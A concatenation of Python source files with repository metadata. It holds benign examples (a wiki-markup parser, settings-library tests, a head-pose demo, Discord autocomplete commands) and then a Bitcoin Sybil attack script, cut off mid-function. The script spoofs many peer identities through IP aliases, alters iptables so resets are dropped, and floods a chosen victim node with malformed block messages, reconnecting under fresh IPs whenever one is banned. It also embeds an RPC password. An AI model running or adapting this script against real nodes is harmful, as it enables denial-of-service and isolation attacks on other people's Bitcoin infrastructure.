Python
examples/simpleWiki.py
klahnakoski/mo-parsing
885bf3fd61430d5fa15164168b975b18988fcf9e
[ "MIT" ]
1
2021-10-30T21:18:29.000Z
2021-10-30T21:18:29.000Z
examples/simpleWiki.py
klahnakoski/mo-parsing
885bf3fd61430d5fa15164168b975b18988fcf9e
[ "MIT" ]
22
2020-04-15T14:49:30.000Z
2021-12-22T02:49:52.000Z
examples/simpleWiki.py
klahnakoski/mo-parsing
885bf3fd61430d5fa15164168b975b18988fcf9e
[ "MIT" ]
null
null
null
from mo_parsing import ParseFatalException  # needed by convertToHTML_A below
from mo_parsing.helpers import QuotedString

wikiInput = """
Here is a simple Wiki input:
  *This is in italics.*
  **This is in bold!**
  ***This is in bold italics!***
  Here's a URL to {{Pyparsing's Wiki Page->https://site-closed.wikispaces.com}}
"""

def convertToHTML(opening, closing):
    def conversionParseAction(t, l, s):
        return opening + t[0] + closing
    return conversionParseAction

italicized = QuotedString("*").add_parse_action(convertToHTML("<I>", "</I>"))
bolded = QuotedString("**").add_parse_action(convertToHTML("<B>", "</B>"))
boldItalicized = QuotedString("***").add_parse_action(convertToHTML("<B><I>", "</I></B>"))

def convertToHTML_A(t, l, s):
    try:
        text, url = t[0].split("->")
    except ValueError:
        raise ParseFatalException(s, l, "invalid URL link reference: " + t[0])
    return '<A href="{}">{}</A>'.format(url, text)

urlRef = QuotedString("{{", end_quote_char="}}").add_parse_action(convertToHTML_A)

wikiMarkup = urlRef | boldItalicized | bolded | italicized
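A quick sketch of applying the grammar, assuming mo_parsing keeps pyparsing's transform-string behaviour under a snake_case name (the method name is an assumption, not verified against the library):

```python
# Hypothetical usage; mo_parsing renames pyparsing methods to snake_case,
# so transform_string is the expected spelling — treat it as an assumption.
html = wikiMarkup.transform_string(wikiInput)
print(html)
# Expected result: *...* becomes <I>...</I>, **...** becomes <B>...</B>,
# and {{text->url}} becomes an <A href="url">text</A> link.
```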
28.131579
91
0.635173
0
0
0
0
0
0
0
0
317
0.296539
4c5b215bf00e243da89ca4e94c55e9e94a7ff44a
9,885
py
Python
tests/test_app_settings_dict.py
wheelercj/app_settings
06224dec0b5baf1eeb92e5a81ca4e8385d4942a6
[ "MIT" ]
null
null
null
tests/test_app_settings_dict.py
wheelercj/app_settings
06224dec0b5baf1eeb92e5a81ca4e8385d4942a6
[ "MIT" ]
null
null
null
tests/test_app_settings_dict.py
wheelercj/app_settings
06224dec0b5baf1eeb92e5a81ca4e8385d4942a6
[ "MIT" ]
null
null
null
import pytest import re from typing import Any, Tuple from dataclasses import dataclass from app_settings_dict import Settings def test_simple_settings() -> None: settings = Settings( settings_file_path="C:/Users/chris/Documents/sample_settings_file_name.json", default_factories={ "key1": lambda: "value1", }, data={ "key1": "hello", "key2": "world", }, ) assert settings["key1"] == "hello" assert settings["key2"] == "world" del settings["key1"] del settings["key2"] assert "key1" not in settings assert "key2" not in settings assert settings["key1"] == "value1" with pytest.raises(KeyError): settings["key2"] def test_default_settings() -> None: settings = Settings( settings_file_path="sample settings file name.json", default_factories={ "key1": lambda: "value1", "key2": lambda: "value2", "key3": lambda: "value3", }, default_settings={ "key3": [], }, data={ "key1": "hello", "key2": "world", }, ) assert settings["key1"] == "hello" assert settings["key2"] == "world" assert settings["key3"] == "value3" del settings["key3"] assert settings["key3"] == "value3" settings.reset("key3") assert settings["key3"] == [] settings["key3"] = "something" assert settings["key3"] == "something" settings.reset_all() assert settings["key1"] == "hello" assert settings["key2"] == "world" assert settings["key3"] == [] def test_load_without_file() -> None: def sample_prompt_function(settings: Settings) -> Settings: # s = input("Enter the settings: ") return settings.update({"key1": "a", "key2": "b"}) settings = Settings( settings_file_path="not a real file.yaml", prompt_user_for_all_settings=sample_prompt_function, default_factories={ "key1": lambda: "value1", "key2": lambda: "value2", "key3": lambda: "value3", }, default_settings={ "key3": [], "key4": "value4", }, data={ "key1": "hello", "key2": "world", }, ) assert settings["key1"] == "hello" assert settings["key2"] == "world" assert settings["key3"] == "value3" settings.load(fallback_option="prompt user") assert settings["key1"] == "a" assert settings["key2"] == "b" assert settings["key3"] == "value3" with pytest.raises(KeyError): settings["key4"] settings.load(fallback_option="default settings") assert settings["key1"] == "a" assert settings["key2"] == "b" assert settings["key3"] == "value3" assert settings["key4"] == "value4" settings.clear() settings.load(fallback_option="default settings") assert settings["key1"] == "hello" assert settings["key2"] == "world" assert settings["key3"] == [] assert settings["key4"] == "value4" with pytest.raises(ValueError): settings.load(fallback_option="invalid option") def test_load_after_empty() -> None: settings = Settings( settings_file_path="sample settings file name.json", prompt_user_for_all_settings=lambda: 1 / 0, default_factories={ "key1": lambda: "value1", }, default_settings={ "key1": [], }, data={ "key1": "hello", }, ) assert settings["key1"] == "hello" settings.clear() assert settings["key1"] == "value1" def test_prompt() -> None: def sample_prompt_function() -> Any: # s = input("Enter a setting: ") return "a" settings = Settings( settings_file_path="sample settings file name.json", prompt_user_for_all_settings=lambda: {"key1": "a", "key2": "b"}, default_factories={ "key1": sample_prompt_function, "key2": lambda: "value2", "key3": lambda: "value3", }, default_settings={ "key3": [], }, data={ "key1": "hello", "key2": "world", }, ) assert settings["key1"] == "hello" settings.prompt("key1") assert settings["key1"] == "a" def test_changing_settings_before_load() -> None: settings = Settings( settings_file_path="sample 
settings file name.json", default_factories={ "key1": lambda: "value1", }, default_settings={ "key1": [], }, data={ "key1": "hello", }, ) assert settings["key1"] == "hello" settings.load(fallback_option="default settings") assert settings["key1"] == "hello" settings["key1"] = "a" settings.load(fallback_option="default settings") assert settings["key1"] == "a" def test_update() -> None: settings = Settings( settings_file_path="sample settings file name.json", default_factories={ "key1": lambda: "value1", }, default_settings={ "key1": [], }, data={ "key1": "hello", }, ) assert settings["key1"] == "hello" settings.update({"key1": "a"}) assert settings["key1"] == "a" settings.update({"key2": "b"}) assert settings["key2"] == "b" def test_Settings__is_using_json() -> None: settings = Settings( settings_file_path="sample_settings_file_name.json", default_factories={ "key1": lambda: "value1", }, data={ "key1": "hello", "key2": "world", }, ) assert settings._Settings__is_using_json() settings.settings_file_path = "sample_settings_file_name.yaml" assert not settings._Settings__is_using_json() def test_load_from_dict() -> None: settings = Settings() settings.load_from_dict( { "key1": "hello", "key2": "world", } ) assert len(settings.data) == 0 settings = Settings( data={ "key1": "a", "key2": "b", } ) settings.load_from_dict( { "key1": "c", "key2": "d", } ) assert settings.data["key1"] == "c" assert settings.data["key2"] == "d" def test_dump_to_dict() -> None: settings = Settings( settings_file_path="sample_settings_file_name.json", data={ "key1": "hello", "key2": "world", }, ) assert settings.dump_to_dict() == { "key1": "hello", "key2": "world", } def test_nested_Settings() -> None: settings = Settings( settings_file_path="sample_settings_file_name.json", default_settings={ "key6": [], "key7": Settings( data={ "key8": "value8", } ), }, data={ "key1": "hello", "key2": "world", "key3": "value3", "key4": Settings( settings_file_path="why would anyone want an inner file though.yaml", data={ "key5": "value5", }, ), }, ) assert settings.dump_to_dict() == { "key1": "hello", "key2": "world", "key3": "value3", "key4": { "key5": "value5", }, } def test_creating_setting_after_init() -> None: settings = Settings( settings_file_path="sample_settings_file_name.json", default_settings={ "key1": [], "key2": "value2", }, ) with pytest.raises(KeyError): settings["key3"] = "value3" def test_prompt_error() -> None: settings = Settings( settings_file_path="nonexistent file.json", default_settings={ "key1": [], "key2": "value2", }, ) with pytest.raises(ValueError): settings.load(fallback_option="prompt user") def test_nested_setting_loaders_and_dumpers() -> None: @dataclass class Coords: x: int y: int def __init__(self, x_and_y: Tuple[int, int]) -> None: self.x = x_and_y[0] self.y = x_and_y[1] settings = Settings( setting_loader=Coords, setting_dumper=lambda obj: (obj.x, obj.y), data={ "location 1": Coords(x_and_y=(1, 2)), "location 2": Coords(x_and_y=(3, 4)), "patterns": Settings( setting_loader=re.compile, setting_dumper=lambda x: x.pattern, data={ "phone number pattern": re.compile(r"\d{3}-?\d{3}-?\d{4}"), "email address pattern": re.compile( r"[\w\d.+-]+@[\w\d.-]+\.[\w\d]+" ), }, ), }, ) settings_dict = settings.dump_to_dict() assert settings_dict["location 1"] == (1, 2) assert settings_dict["location 2"] == (3, 4) assert settings_dict["patterns"]["phone number pattern"] == r"\d{3}-?\d{3}-?\d{4}" assert ( settings_dict["patterns"]["email address pattern"] == r"[\w\d.+-]+@[\w\d.-]+\.[\w\d]+" ) 
settings.load_from_dict(settings_dict) assert settings["location 1"] == Coords(x_and_y=(1, 2)) assert settings["location 2"] == Coords(x_and_y=(3, 4)) assert settings["patterns"]["phone number pattern"] == re.compile( r"\d{3}-?\d{3}-?\d{4}" ) assert settings["patterns"]["email address pattern"] == re.compile( r"[\w\d.+-]+@[\w\d.-]+\.[\w\d]+" ) def test_init_without_keywords() -> None: with pytest.raises(TypeError): Settings("sample settings file path.json")
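Distilling the API these tests exercise, a minimal sketch of the `Settings` pattern; the file path and keys are illustrative, not taken from the test suite:

```python
# Minimal sketch based on the behaviour asserted above.
settings = Settings(
    settings_file_path="app_settings.json",          # hypothetical file
    default_factories={"theme": lambda: "dark"},     # lazily fills missing keys
    default_settings={"recent_files": []},           # used by reset() and load fallback
    data={"theme": "light"},
)
assert settings["theme"] == "light"
del settings["theme"]
assert settings["theme"] == "dark"                   # recreated by its default factory
settings.load(fallback_option="default settings")    # falls back when the file is absent
```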
27.84507
86
0.527466
170
0.017198
0
0
185
0.018715
0
0
2,407
0.2435
4c5b696f9bc64bbbc8bda141e564e9a8de0891a8
5,910
py
Python
demo/demo_FSANET_ssd.py
jacke121/FSA-Net
c4d60bd38e9d17b0ea33d824ec443a01bdeba015
[ "Apache-2.0" ]
null
null
null
demo/demo_FSANET_ssd.py
jacke121/FSA-Net
c4d60bd38e9d17b0ea33d824ec443a01bdeba015
[ "Apache-2.0" ]
null
null
null
demo/demo_FSANET_ssd.py
jacke121/FSA-Net
c4d60bd38e9d17b0ea33d824ec443a01bdeba015
[ "Apache-2.0" ]
null
null
null
import os import time import cv2 import sys sys.path.append('..') import numpy as np from math import cos, sin from lib.FSANET_model import * import numpy as np from keras.layers import Average def draw_axis(img, yaw, pitch, roll, tdx=None, tdy=None, size = 50): print(yaw,roll,pitch) pitch = pitch * np.pi / 180 yaw = -(yaw * np.pi / 180) roll = roll * np.pi / 180 if tdx != None and tdy != None: tdx = tdx tdy = tdy else: height, width = img.shape[:2] tdx = width / 2 tdy = height / 2 # X-Axis pointing to right. drawn in red x1 = size * (cos(yaw) * cos(roll)) + tdx y1 = size * (cos(pitch) * sin(roll) + cos(roll) * sin(pitch) * sin(yaw)) + tdy # Y-Axis | drawn in green # v x2 = size * (-cos(yaw) * sin(roll)) + tdx y2 = size * (cos(pitch) * cos(roll) - sin(pitch) * sin(yaw) * sin(roll)) + tdy # Z-Axis (out of the screen) drawn in blue x3 = size * (sin(yaw)) + tdx y3 = size * (-cos(yaw) * sin(pitch)) + tdy cv2.line(img, (int(tdx), int(tdy)), (int(x1),int(y1)),(0,0,255),3) cv2.line(img, (int(tdx), int(tdy)), (int(x2),int(y2)),(0,255,0),3) cv2.line(img, (int(tdx), int(tdy)), (int(x3),int(y3)),(255,0,0),2) return img def draw_results_ssd(detected,input_img,faces,ad,img_size,img_w,img_h,model): # loop over the detections if detected.shape[2]>0: for i in range(0, detected.shape[2]): # extract the confidence (i.e., probability) associated with the # prediction confidence = detected[0, 0, i, 2] # filter out weak detections if confidence > 0.5: # compute the (x, y)-coordinates of the bounding box for # the face and extract the face ROI (h0, w0) = input_img.shape[:2] box = detected[0, 0, i, 3:7] * np.array([w0, h0, w0, h0]) (startX, startY, endX, endY) = box.astype("int") # print((startX, startY, endX, endY)) x1 = startX y1 = startY w = endX - startX h = endY - startY x2 = x1+w y2 = y1+h xw1 = max(int(x1 - ad * w), 0) yw1 = max(int(y1 - ad * h), 0) xw2 = min(int(x2 + ad * w), img_w - 1) yw2 = min(int(y2 + ad * h), img_h - 1) cv2.rectangle(input_img, (xw1,yw1), (xw2,yw2), (0, 0, 255), 2) start=time.time() faces[i,:,:,:] = cv2.resize(input_img[yw1:yw2 + 1, xw1:xw2 + 1, :], (img_size, img_size)) faces[i,:,:,:] = cv2.normalize(faces[i,:,:,:], None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX) face = np.expand_dims(faces[i,:,:,:], axis=0) p_result = model.predict(face) print('fangxiang',time.time()-start) face = face.squeeze() img = draw_axis(input_img[yw1:yw2 + 1, xw1:xw2 + 1, :], p_result[0][0], p_result[0][1], p_result[0][2]) input_img[yw1:yw2 + 1, xw1:xw2 + 1, :] = img return input_img def main(): os.makedirs('./img',exist_ok=True) img_size = 64 img_idx = 0 ad = 0.6 #Parameters num_capsule = 3 dim_capsule = 16 routings = 2 stage_num = [3,3,3] lambda_d = 1 num_classes = 3 image_size = 64 num_primcaps = 7*3 m_dim = 5 S_set = [num_capsule, dim_capsule, routings, num_primcaps, m_dim] model1 = FSA_net_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)() model2 = FSA_net_Var_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)() num_primcaps = 8*8*3 S_set = [num_capsule, dim_capsule, routings, num_primcaps, m_dim] model3 = FSA_net_noS_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)() weight_file1 = '../pre-trained/300W_LP_models/fsanet_capsule_3_16_2_21_5/fsanet_capsule_3_16_2_21_5.h5' model1.load_weights(weight_file1) print('Finished loading model 1.') weight_file2 = '../pre-trained/300W_LP_models/fsanet_var_capsule_3_16_2_21_5/fsanet_var_capsule_3_16_2_21_5.h5' weight_file3 = '../pre-trained/300W_LP_models/fsanet_noS_capsule_3_16_2_192_5/fsanet_noS_capsule_3_16_2_192_5.h5' 
model2.load_weights(weight_file2) print('Finished loading model 2.') model3.load_weights(weight_file3) print('Finished loading model 3.') inputs = Input(shape=(64,64,3)) x1 = model1(inputs) #1x1 x2 = model2(inputs) #var x3 = model3(inputs) #w/o avg_model = Average()([x1,x2,x3]) model = Model(inputs=inputs, outputs=avg_model) # load our serialized face detector from disk print("[INFO] loading face detector...") protoPath = os.path.sep.join(["face_detector", "deploy.prototxt"]) modelPath = os.path.sep.join(["face_detector", "res10_300x300_ssd_iter_140000.caffemodel"]) net = cv2.dnn.readNetFromCaffe(protoPath, modelPath) # capture video cap = cv2.VideoCapture(0) # cap.set(cv2.CAP_PROP_FRAME_WIDTH, 1024*1) # cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 768*1) while True: # get video frame ret, input_img = cap.read() img_idx = img_idx + 1 img_h, img_w, _ = np.shape(input_img) blob = cv2.dnn.blobFromImage(cv2.resize(input_img, (300, 300)), 1.0, (300, 300), (104.0, 177.0, 123.0)) net.setInput(blob) detected = net.forward() faces = np.empty((detected.shape[2], img_size, img_size, 3)) input_img = draw_results_ssd(detected,input_img,faces,ad,img_size,img_w,img_h,model) # cv2.imwrite('img/'+str(img_idx)+'.png',input_img) cv2.imshow("result", input_img) key = cv2.waitKey(1) if __name__ == '__main__': main()
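The pose axes can be previewed without the SSD pipeline by calling the `draw_axis` helper defined above directly; the angles in this sketch are arbitrary test values:

```python
# Quick sketch: render yaw/pitch/roll axes on a blank canvas using draw_axis.
import numpy as np
import cv2

canvas = np.zeros((200, 200, 3), dtype=np.uint8)
canvas = draw_axis(canvas, yaw=30, pitch=-10, roll=5)  # arbitrary angles in degrees
cv2.imwrite('axes_preview.png', canvas)
```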
34.16185
122
0.577496
0
0
0
0
0
0
0
0
1,142
0.193232
4c5b93a68b2014eb34642b9dabeaf09a9053d01e
5,118
py
Python
examples/app_commands/slash_autocomplete.py
Mihitoko/pycord
137c1474eed5fb4273e542bd22ad76764a8712fc
[ "MIT" ]
null
null
null
examples/app_commands/slash_autocomplete.py
Mihitoko/pycord
137c1474eed5fb4273e542bd22ad76764a8712fc
[ "MIT" ]
null
null
null
examples/app_commands/slash_autocomplete.py
Mihitoko/pycord
137c1474eed5fb4273e542bd22ad76764a8712fc
[ "MIT" ]
1
2022-02-20T09:10:40.000Z
2022-02-20T09:10:40.000Z
import discord from discord.commands import option bot = discord.Bot(debug_guilds=[...]) COLORS = ["red", "orange", "yellow", "green", "blue", "indigo", "violet"] LOTS_OF_COLORS = [ "aliceblue", "antiquewhite", "aqua", "aquamarine", "azure", "beige", "bisque", "blueviolet", "brown", "burlywood", "cadetblue", "cornflowerblue", "cornsilk", "crimson", "cyan", "darkblue", "deepskyblue", "dimgray", "dimgrey", "dodgerblue", "firebrick", "floralwhite", "forestgreen", "fuchsia", "gainsboro", "ghostwhite", "gold", "goldenrod", "gray", "green", "greenyellow", "grey", "honeydew", "hotpink", "indianred", "indigo", "ivory", "khaki", "lavender", "lavenderblush", "lawngreen", "lightcoral", "maroon", "mediumaquamarine", "mediumblue", "mediumorchid", "midnightblue", "navajowhite", "navy", "oldlace", "olive", "olivedrab", "orange", "orangered", "orchid", "palegoldenrod", "palegreen", "plum", "powderblue", "purple", "red", "rosybrown", "royalblue", "saddlebrown", "sienna", "springgreen", "steelblue", "tan", "teal", "thistle", "tomato", "turquoise", "violet", "wheat", "white", "whitesmoke", "yellow", "yellowgreen", ] BASIC_ALLOWED = [...] # This would normally be a list of discord user IDs for the purpose of this example async def color_searcher(ctx: discord.AutocompleteContext): """ Returns a list of matching colors from the LOTS_OF_COLORS list. In this example, we've added logic to only display any results in the returned list if the user's ID exists in the BASIC_ALLOWED list. This is to demonstrate passing a callback in the discord.utils.basic_autocomplete function. """ return [color for color in LOTS_OF_COLORS if ctx.interaction.user.id in BASIC_ALLOWED] async def get_colors(ctx: discord.AutocompleteContext): """Returns a list of colors that begin with the characters entered so far.""" return [color for color in COLORS if color.startswith(ctx.value.lower())] async def get_animals(ctx: discord.AutocompleteContext): """Returns a list of animals that are (mostly) the color selected for the "color" option.""" picked_color = ctx.options["color"] if picked_color == "red": return ["cardinal", "ladybug"] elif picked_color == "orange": return ["clownfish", "tiger"] elif picked_color == "yellow": return ["goldfinch", "banana slug"] elif picked_color == "green": return ["tree frog", "python"] elif picked_color == "blue": return ["blue jay", "blue whale"] elif picked_color == "indigo": return ["eastern indigo snake"] # Needs to return an iterable even if only one item elif picked_color == "violet": return ["purple emperor butterfly", "orchid dottyback"] else: return ["rainbowfish"] @bot.slash_command(name="ac_example") @option("color", description="Pick a color!", autocomplete=get_colors) @option("animal", description="Pick an animal!", autocomplete=get_animals) async def autocomplete_example( ctx: discord.ApplicationContext, color: str, animal: str, ): """ Demonstrates using ctx.options to create options that are dependent on the values of other options. For the `color` option, a callback is passed, where additional logic can be added to determine which values are returned. 
For the `animal` option, the callback uses the input from the color option to return an iterable of animals.
    """
    await ctx.respond(f"You picked {color} for the color, which allowed you to choose {animal} for the animal.")


@bot.slash_command(name="ac_basic_example")
@option(
    "color",
    description="Pick a color from this big list!",
    autocomplete=discord.utils.basic_autocomplete(color_searcher),
    # Demonstrates passing a callback to discord.utils.basic_autocomplete
)
@option(
    "animal",
    description="Pick an animal from this small list",
    autocomplete=discord.utils.basic_autocomplete(["snail", "python", "cricket", "orca"]),
    # Demonstrates passing a static iterable to discord.utils.basic_autocomplete
)
async def autocomplete_basic_example(
    ctx: discord.ApplicationContext,
    color: str,
    animal: str,
):
    """
    This demonstrates using the discord.utils.basic_autocomplete helper function.

    For the `color` option, a callback is passed, where additional logic can be added to
    determine which values are returned.

    For the `animal` option, a static iterable is passed. While only a few values for `animal`
    are used in this example, iterables of any length can be passed to discord.utils.basic_autocomplete.

    Note that the basic_autocomplete function itself will still only return a maximum of 25 items.
    """
    await ctx.respond(f"You picked {color} as your color, and {animal} as your animal!")


bot.run("TOKEN")
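Following the same pattern, a standalone sketch of an autocomplete callback that filters a static list by the characters the user has typed so far (exposed as `ctx.value`); the command and list are hypothetical additions, not part of the example file:

```python
# Hypothetical extra command in the same style as the file above.
async def get_fruits(ctx: discord.AutocompleteContext):
    fruits = ["apple", "apricot", "banana", "cherry"]
    return [fruit for fruit in fruits if fruit.startswith(ctx.value.lower())]


@bot.slash_command(name="fruit_example")
@option("fruit", description="Pick a fruit!", autocomplete=get_fruits)
async def fruit_example(ctx: discord.ApplicationContext, fruit: str):
    await ctx.respond(f"You picked {fruit}!")
```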
27.079365
112
0.657679
0
0
0
0
2,025
0.395662
2,852
0.557249
3,085
0.602775
4c5bad7796ac5e7201e5d6fb5312abee3b503a5c
11,522
py
Python
tools/Networking/sybil_block_no_ban.py
simewu/bitcoin_researcher
b9fd2efdb8ae8467c5bd4b3320713a541635df16
[ "MIT" ]
1
2020-02-15T21:44:04.000Z
2020-02-15T21:44:04.000Z
tools/Networking/sybil_block_no_ban.py
SimeoW/bitcoin
3644405f06c8b16a437513e8c02f0f061b91be2e
[ "MIT" ]
null
null
null
tools/Networking/sybil_block_no_ban.py
SimeoW/bitcoin
3644405f06c8b16a437513e8c02f0f061b91be2e
[ "MIT" ]
null
null
null
from _thread import start_new_thread from bitcoin.messages import * from bitcoin.net import CAddress from bitcoin.core import CBlock from io import BytesIO as _BytesIO import atexit import bitcoin import fcntl import hashlib import json import os import random import re import socket import struct import sys import time import datetime if os.geteuid() != 0: sys.exit("\nYou need to have root privileges to run this script.\nPlease try again, this time using 'sudo'. Exiting.\n") # Specify the attacker's genuine IP attacker_ip = input('\nEnter attacker\'s IP address: ') # Specify the victim's IP, and port (8333 for Bitcoin) victim_ip = input('Enter victim\'s IP address: ') victim_port = 8333 # How many identities should run simultaneously num_identities = 8 # While attacking the victim, wait this many seconds before sending each version message seconds_between_version_packets = 0.1 identity_interface = [] # Keeps the IP alias interface and IP for each successful connection identity_address = [] # Keeps the IP and port for each successful connection identity_socket = [] # Keeps the socket for each successful connection # The file where the iptables backup is saved, then restored when the script ends iptables_file_path = f'{os.path.abspath(os.getcwd())}/backup.iptables.rules' # Send commands to the Linux terminal def terminal(cmd): return os.popen(cmd).read() # Send commands to the Bitcoin Core Console def bitcoin(cmd): return os.popen('./../../src/bitcoin-cli -rpcuser=cybersec -rpcpassword=kZIdeN4HjZ3fp9Lge4iezt0eJrbjSi8kuSuOHeUkEUbQVdf09JZXAAGwF3R5R2qQkPgoLloW91yTFuufo7CYxM2VPT7A5lYeTrodcLWWzMMwIrOKu7ZNiwkrKOQ95KGW8kIuL1slRVFXoFpGsXXTIA55V3iUYLckn8rj8MZHBpmdGQjLxakotkj83ZlSRx1aOJ4BFxdvDNz0WHk1i2OPgXL4nsd56Ph991eKNbXVJHtzqCXUbtDELVf4shFJXame -rpcport=8332 ' + cmd).read() # Generate a random identity using the broadcast address template def random_ip(): # By forcing the IP to be above a certain threshhold, it prevents a lot of errors minimum_ip_range = min(int(attacker_ip.split('.')[-1]), int(victim_ip.split('.')[-1])) + 1 while(True): ip = broadcast_address old_ip = '' while(old_ip != ip): old_ip = ip ip = ip.replace('255', str(random.randint(minimum_ip_range, 255)), 1) # Don't accept already assigned IPs if ip == default_gateway: continue if ip == victim_ip: continue if ip not in [x[0] for x in identity_address]: break return ip #return f'10.0.{str(random.randint(0, 255))}.{str(random.randint(0, 255))}' # Checking the internet by sending a single ping to Google #def internet_is_active(): # return os.system('ping -c 1 google.com') == 0 # If all else fails, we can use this to recover the network #def reset_network(): # print('Resetting network...') # terminal(f'sudo ifconfig {network_interface} {attacker_ip} down') # terminal(f'sudo ifconfig {network_interface} {attacker_ip} up') # Create an alias for a specified identity def ip_alias(ip_address): global alias_num print(f'Setting up IP alias {ip_address} on {network_interface}') interface = f'{network_interface}:{alias_num}' terminal(f'sudo ifconfig {interface} {ip_address} netmask 255.255.255.0 broadcast {broadcast_address} up') alias_num += 1 return interface # Construct a block packet using python-bitcoinlib def block_packet_bytes(): hashPrevBlock = bytearray(random.getrandbits(8) for _ in range(32)) hashMerkleRoot = bytearray(random.getrandbits(8) for _ in range(32)) nTime = int((datetime.datetime.now() - datetime.datetime(1970, 1, 1)).total_seconds())#.to_bytes(8, 'little') nNonce = random.getrandbits(32) msg = CBlock( 
nVersion=bitcoin_protocolversion, hashPrevBlock=hashPrevBlock, #hashPrevBlock='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', hashMerkleRoot=hashMerkleRoot, #hashMerkleRoot='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', nTime=nTime, nBits=0, nNonce=nNonce, vtx=() ) name = 'block' f = _BytesIO() msg.stream_serialize(f) body = f.getvalue() res = b'\xf9\xbe\xb4\xd9' res += name.encode() res += b"\x00" * (12 - len(name)) res += struct.pack(b"<I", len(body)) #th = hashlib.sha256(body).digest() # add checksum #h = hashlib.sha256(th).digest() #res += h[:4] res += bytearray(random.getrandbits(8) for _ in range(4)) res += body return res # Construct a version packet using python-bitcoinlib def version_packet(src_ip, dst_ip, src_port, dst_port): msg = msg_version(bitcoin_protocolversion) msg.nVersion = bitcoin_protocolversion msg.addrFrom.ip = src_ip msg.addrFrom.port = src_port msg.addrTo.ip = dst_ip msg.addrTo.port = dst_port # Default is /python-bitcoinlib:0.11.0/ msg.strSubVer = bitcoin_subversion.encode() # Look like a normal node return msg # Close a connection def close_connection(socket, ip, port, interface): socket.close() terminal(f'sudo ifconfig {interface} {ip} down') if socket in identity_socket: identity_socket.remove(socket) else: del socket if interface in identity_interface: identity_interface.remove(interface) if (ip, port) in identity_address: identity_address.remove((ip, port)) print(f'Successfully closed connection to ({ip} : {port})') # Creates a fake connection to the victim def make_fake_connection(src_ip, dst_ip, verbose=True): src_port = random.randint(1024, 65535) dst_port = victim_port print(f'Creating fake identity ({src_ip} : {src_port}) to connect to ({dst_ip} : {dst_port})...') interface = ip_alias(src_ip) identity_interface.append(interface) if verbose: print(f'Successfully set up IP alias on interface {interface}') if verbose: print('Resulting ifconfig interface:') if verbose: print(terminal(f'ifconfig {interface}').rstrip() + '\n') if verbose: print('Setting up iptables configurations') terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL RST,ACK -j DROP') terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL FIN,ACK -j DROP') terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL FIN -j DROP') terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL RST -j DROP') if verbose: print('Creating network socket...') s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if verbose: print(f'Setting socket network interface to "{network_interface}"...') success = s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, str(network_interface + '\0').encode('utf-8')) while success == -1: print(f'Setting socket network interface to "{network_interface}"...') success = s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, str(network_interface + '\0').encode('utf-8')) time.sleep(1) print(network_interface) if verbose: print(f'Binding socket to ({src_ip} : {src_port})...') s.bind((src_ip, src_port)) if verbose: print(f'Connecting ({src_ip} : {src_port}) to ({dst_ip} : {dst_port})...') try: s.connect((dst_ip, dst_port)) except: close_connection(s, src_ip, src_port, interface) make_fake_connection(random_ip(), dst_ip, False) return # Send version packet version = version_packet(src_ip, dst_ip, src_port, dst_port) s.send(version.to_bytes()) # 
Receive the peer's version packet
    verack = s.recv(1924)
    # Send verack packet
    verack = msg_verack(bitcoin_protocolversion)
    s.send(verack.to_bytes())
    # Get verack packet
    verack = s.recv(1024)

    if verbose: print('Connection successful!')

    identity_address.append((src_ip, src_port))
    identity_socket.append(s)

    # Listen to the connections for future packets
    if verbose: print(f'Attaching attacker script to {interface}')
    try:
        start_new_thread(attack, (), {
            'socket': s,
            'src_ip': src_ip,
            'src_port': src_port,
            'dst_ip': dst_ip,
            'dst_port': dst_port,
            'interface': interface
        })
    except:
        print(f'Error: unable to start thread to sniff interface {interface}')

# Send block packets repeatedly, until the connection is closed
def attack(socket, src_ip, src_port, dst_ip, dst_port, interface):
    block = block_packet_bytes()
    while True:
        if seconds_between_version_packets != 0:
            time.sleep(seconds_between_version_packets)
        try:
            socket.send(block)
        except Exception as e:
            print(e)
            break
    close_connection(socket, src_ip, src_port, interface)
    print(f'Peer was banned ({src_ip} : {src_port})')
    make_fake_connection(random_ip(), dst_ip, False)

# Initialize the network
def initialize_network_info():
    print('Retrieving network info...')
    global default_gateway, network_interface, broadcast_address

    # Get the network interface of the default gateway
    m = re.search(r'default +via +([^ ]+) +dev +([^ ]+)', terminal('ip route'))
    if m != None:
        default_gateway = m.group(1).strip()
        network_interface = m.group(2).strip()
    else:
        print('Error: Network interface couldn\'t be found.')
        sys.exit()

    # Get the broadcast address of the network interface
    # Used as an IP template of what can change, so that packets still come back to the sender
    m = re.search(r'broadcast ([^ ]+)', terminal(f'ifconfig {network_interface}'))
    if m != None:
        broadcast_address = m.group(1).strip()
    else:
        print('Error: Network broadcast IP couldn\'t be found.')
        sys.exit()

# Initialize Bitcoin info
def initialize_bitcoin_info():
    print('Retrieving bitcoin info...')
    global bitcoin_subversion
    global bitcoin_protocolversion
    bitcoin_subversion = '/Satoshi:0.18.0/'
    bitcoin_protocolversion = 70015
    try:
        network_info = None #json.loads(bitcoin('getnetworkinfo'))
        if 'subversion' in network_info:
            bitcoin_subversion = network_info['subversion']
        if 'protocolversion' in network_info:
            bitcoin_protocolversion = network_info['protocolversion']
    except:
        pass

# Save a backup of the iptables rules
def backup_iptables():
    terminal(f'iptables-save > {iptables_file_path}')

# Restore the backup of the iptables rules
def cleanup_iptables():
    if(os.path.exists(iptables_file_path)):
        print('Cleaning up iptables configuration')
        terminal(f'iptables-restore < {iptables_file_path}')
        os.remove(iptables_file_path)

# Remove all ip aliases that were created by the script
def cleanup_ipaliases():
    for i in range(0, len(identity_address)):
        try:
            ip = identity_address[i][0]
            interface = identity_interface[i]
